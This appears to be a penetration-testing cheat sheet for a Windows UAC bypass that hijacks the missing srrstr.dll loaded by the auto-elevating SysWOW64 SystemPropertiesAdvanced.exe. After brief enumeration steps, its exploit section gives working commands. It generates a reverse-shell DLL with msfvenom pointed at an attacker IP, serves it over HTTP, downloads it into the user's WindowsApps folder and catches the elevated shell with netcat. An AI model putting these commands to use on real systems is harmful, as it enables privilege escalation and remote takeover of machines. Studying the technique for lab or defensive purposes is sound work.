Some UAC bypasses abuse auto-elevating Windows binaries that attempt to load missing DLLs.
If the DLL search path includes a writable user-controlled directory, an attacker may be able to place a malicious DLL there and trigger elevated loading.
Windows commonly searches DLLs in this order:
- The directory from which the application was loaded
C:\Windows\System32C:\Windows\SystemC:\Windows- Directories listed in the
PATHenvironment variable
One known example involves the 32-bit version of:
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
This binary may attempt to load:
srrstr.dll
If a writable directory appears in the search path, a malicious DLL with the same name may be loaded in an elevated context. (Usually WindowsApps is writeable by the user)
Enumeration
Review the current PATH:
cmd /c echo %PATH%
Check whether the user's WindowsApps directory exists:
dir "%LOCALAPPDATA%\Microsoft\WindowsApps"
Check permissions:
icacls "%LOCALAPPDATA%\Microsoft\WindowsApps"
Interesting findings include:
- Writable user directory in
%PATH% - Missing DLL loaded by an auto-elevating binary
- Vulnerable Windows build
- Compatible UAC settings
- Current user is a local administrator
Exploit
- Confirm the current user is a local administrator
- Confirm the target build is vulnerable
- Identify the missing DLL name
- Place a malicious DLL in the writable search path
- Trigger the auto-elevating binary
- Verify elevated execution
Generate the DLL:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f dll -o srrstr.dll
The SysWOW64 binary is 32-bit, so the DLL must also be 32-bit.
Host the DLL:
python3 -m http.server 8080
Download it to the target:
Invoke-WebRequest -Uri "http://10.10.14.3:8080/srrstr.dll" -OutFile "$env:LOCALAPPDATA\Microsoft\WindowsApps\srrstr.dll"
Start a listener:
nc -lvnp 4444
Trigger the auto-elevating binary:
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
If the technique succeeds, the DLL is loaded by the elevated process.